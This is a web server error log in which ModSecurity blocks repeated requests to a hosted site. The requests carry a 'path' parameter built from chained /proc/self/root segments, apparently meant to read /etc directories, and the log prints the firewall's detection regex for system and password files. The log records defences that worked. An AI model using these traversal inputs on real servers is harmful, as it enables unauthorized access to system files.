[Tue Mar 17 14:23:27.984755 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.241.31:56360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOD6t8Nd0UC_OcbVHL_gAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:28.978093 2026] [:error] [pid 17965:tid 140411540502272] [client 74.7.243.128:37784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOEKt8Nd0UC_OcbVHL_wAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:29.666405 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.241.31:53586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOEa4xEDsg_V3ESNZNfgAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:30.057867 2026] [proxy_fcgi:error] [pid 18380:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55830] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:23:31.029580 2026] [:error] [pid 28879:tid 140411565680384] [client 74.7.241.31:53600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOE1DN3UhJjLukrK-MOgAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:32.566833 2026] [core:alert] [pid 18380:tid 140411649607424] [client 74.7.241.31:53602] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:33.100824 2026] [:error] [pid 28879:tid 140411616036608] [client 74.7.243.128:55714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOFVDN3UhJjLukrK-MPwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:33.139171 2026] [:error] [pid 29359:tid 140411624429312] [client 74.7.241.31:53604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOFaSy22zYCMGxsIld8wAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:34.400769 2026] [:error] [pid 29359:tid 140411616036608] [client 74.7.243.128:55718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOFqSy22zYCMGxsIld9QAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:36.386582 2026] [:error] [pid 29359:tid 140411565680384] [client 74.7.241.31:53610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOFqSy22zYCMGxsIld9gAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:36.389852 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.243.128:55730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOF6t8Nd0UC_OcbVHMAwAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:37.705110 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.241.31:51086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOGat8Nd0UC_OcbVHMCAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:52.127106 2026] [proxy_fcgi:error] [pid 11293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56438] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:23:54.472720 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.241.31:51094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOKa4xEDsg_V3ESNZNhAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:54.473560 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.243.128:55736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOKat8Nd0UC_OcbVHMEwAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:54.695557 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:51094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOKq4xEDsg_V3ESNZNhQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:56.569460 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:51204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOLBj0p0SRWAqcjGF6ogAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:57.047399 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.243.128:34150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOLXIk7brgkOH-rIWM3AAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:58.008411 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:56950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOLq4xEDsg_V3ESNZNiAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:59.432352 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.241.31:56960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOL3Ik7brgkOH-rIWM4AAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:59.957903 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.243.128:34164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOL3Ik7brgkOH-rIWM4QAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:02.394488 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.243.128:37640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOMXIk7brgkOH-rIWM4gAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:02.398492 2026] [:error] [pid 9299:tid 140411590858496] [client 74.7.241.31:56964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOML-sgTmmJoPuMdy3cQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:14.121787 2026] [proxy_fcgi:error] [pid 28879:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57166] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:24:15.398057 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:56092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOP9Y0UrI5A3LftIz9OwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
